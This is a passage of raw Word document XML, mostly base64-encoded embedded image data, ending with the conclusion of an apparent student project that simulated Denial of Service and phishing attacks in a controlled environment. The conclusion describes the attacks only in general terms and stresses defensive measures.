ERU+7/6FQm50+WRf+AUy&#10;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NVk9QawMAAGwIAAAO&#10;AAAAAAAAAAAAAAAAADwCAABkcnMvZTJvRG9jLnhtbFBLAQItAAoAAAAAAAAAIQBNNbCATVYBAE1W&#10;AQAVAAAAAAAAAAAAAAAAANMFAABkcnMvbWVkaWEvaW1hZ2UxLmpwZWdQSwECLQAUAAYACAAAACEA&#10;h9d68OAAAAAJAQAADwAAAAAAAAAAAAAAAABTXAEAZHJzL2Rvd25yZXYueG1sUEsBAi0AFAAGAAgA&#10;AAAhAFhgsxu6AAAAIgEAABkAAAAAAAAAAAAAAAAAYF0BAGRycy9fcmVscy9lMm9Eb2MueG1sLnJl&#10;bHNQSwUGAAAAAAYABgB9AQAAUV4BAAAA&#10;">
                <v:shape id="Image 61" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:95;top:95;width:36595;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ZxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvhX6H5Qne6iYepKSuUgShCOLfFHp7ZF83odm3Mbua5Nu7BcHjMDO/YebL3tbiRq2vHCtIJwkI&#10;4sLpio2C82n99g7CB2SNtWNSMJCH5eL1ZY6Zdh0f6HYMRkQI+wwVlCE0mZS+KMmin7iGOHq/rrUY&#10;omyN1C12EW5rOU2SmbRYcVwosaFVScXf8WoVdDr/Md+nMOy9vJhdvqq3wyZVajzqPz9ABOrDM/xo&#10;f2kFsxT+v8QfIBd3AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAP6W3JnEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;">
                  <v:imagedata r:id="rId50" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 62" o:spid="_x0000_s1028" style="position:absolute;left:47;top:47;width:36690;height:22568;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3669029,225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pIwwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;EMXvgt8hjLA3Te2hSDXKIgjiZf178DbbzLZlm0lJYq1+erOw4PHx5v3evMWqN43oyPnasoLpJAFB&#10;XFhdc6ngfNqMZyB8QNbYWCYFD/KwWg4HC8y1vfOBumMoRYSwz1FBFUKbS+mLigz6iW2Jo/djncEQ&#10;pSuldniPcNPINEkyabDm2FBhS+uKit/jzcQ3wva0d5eu31yfu3qWZuVX+r1X6mPUf85BBOrD+/g/&#10;vdUKshT+tkQAyOULAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAgliKSMMAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m,2256789r3669029,l3669029,,,,,2256789xe" filled="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="68240CA7" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="4"/>
        </w:rPr>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A0659E1" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="187" w:line="321" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B2E633" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360" w:right="25"/>
      </w:pPr>
      <w:r>
        <w:t>In this project, we successfully simulated two common types of cyberattacks: Denial of Service (DoS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Phishing.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>These</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>simulations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>demonstrated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>how</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attackers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>systems</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>human behavior to disrupt services or steal sensitive information. The DoS attack showcased the impact of overwhelming server resources with excessive requests, rendering the service unavailable to legitimate users. On the other hand, the phishing attack highlighted how attackers can deceive individuals by creating fake websites to harvest credentials. Both exercises emphasize the importance of robust cybersecurity measures, user awareness, and proactive mitigation strategies to safeguard systems and users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>such</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>threats.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>These</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attacks,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>conducted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>controlled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>environment,</w:t>
      </w:r>
